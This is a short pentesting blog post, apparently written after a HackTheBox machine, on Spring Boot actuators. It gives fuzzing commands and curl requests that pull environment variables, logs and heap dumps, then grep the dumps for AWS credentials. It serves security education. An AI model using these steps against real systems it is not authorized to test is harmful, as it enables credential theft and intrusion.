Rachit Arora
SpringBoot Pentesting
Feb 27, 2024
I was solving CozyHosting from HTB, whose initial foothold was related to Spring Boot, so I'm gonna dive deeper like I always do.
Vulnerable Spring application, if you want to test it out while reading the blog.
This GitHub repository is associated with the blog linked below:
Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators
What is Spring Boot?
Spring Boot is a powerful and versatile framework that simplifies the development of web applications. Its simplicity, versatility, and active community make it a popular choice among developers.
Spring ≠ Spring Boot
| Spring | Spring Boot |
|---|---|
| Spring is a popular Java-based framework used for building web applications. | Spring Boot is a framework built on top of Spring. |
| Spring provides a wide range of features and tools for building web applications. | Spring Boot simplifies the development process by eliminating the need for developers to write boilerplate code. |
The story of Actuator.
Spring Boot includes a number of additional features called actuators to help monitor and control an application once it is pushed to production. Actuators allow controlling and monitoring an application using either HTTP or JMX endpoints.
They can be quite helpful for debugging or monitoring a Spring application, but if you expose them too widely, things can get dangerous very quickly.
Spring provides a list of all actuators that are present by default and can be enabled.
The built-in endpoints are only auto-configured when they are available. Most applications choose exposure via HTTP, where the ID of the endpoint, prefixed with /actuator, is mapped to a URL. For example, by default the health endpoint is mapped to /actuator/health.
Fuzzing Actuators
ffuf -w ~/Desktop/tools/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt -u http://10.10.11.224:55555/FUZZ
gobuster dir -w ~/wordlist/KaliLists/dirbuster/directory-list-2.3-medium.txt --url http://cozyhosting.htb/
Scanning pages simultaneously
$ cat domains.txt
domain.com
sub1.domain.com
sub2.domain.com
[... etc ...]
$ ffuf -w endpoints.txt:PATH -w domains.txt:DOMAIN -u http://DOMAIN/PATH
A more automated and easier-to-follow way of doing this is described in the blog linked below.
Spring Actuator Security, Part 3: Finding Exposed Actuators using Dynamic Testing with ffuf
Finding Actuators (Manually)
Spring Actuator Security, Part 2: Finding Actuators using Static Code Analysis with semgrep
Exploiting Actuators
Looking for Secrets
curl localhost:8081/actuator/env | jq .
// ... lots of stuff
"DB_CONN": {
"value": "psql://server/db",
"origin": "System Environment Property \"DB_CONN\""
},
// ... lots of stuff
Reading logs
curl localhost:8081/actuator/logfile
2022-08-24 13:45:14.813 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-08-24 13:45:14.814 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest
Dumping the dump (Heapdump)
curl localhost:8081/actuator/heapdump -o heap.bin
This endpoint does exactly what it sounds like: it takes a copy of the Java heap (i.e., the memory of the application) and hands it to me as a large blob of binary data.
Now you can just run strings heap.bin | grep -C 20 AWS to look for credentials inside it.
This does not even scratch the surface of Spring Boot exploitation; I have linked better and more in-depth blogs about it by pros.
More about Exploiting Actuators
Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators
Exploiting Spring Boot Actuators - Veracode
References
SPRING BOOT PENTESTING PART 1- FUNDAMENTALS
SPRING BOOT PENTESTING PART 2- ACTUATORS
Have any questions?
Do you have any questions? Feel free to reach out to me on Twitter or on LinkedIn.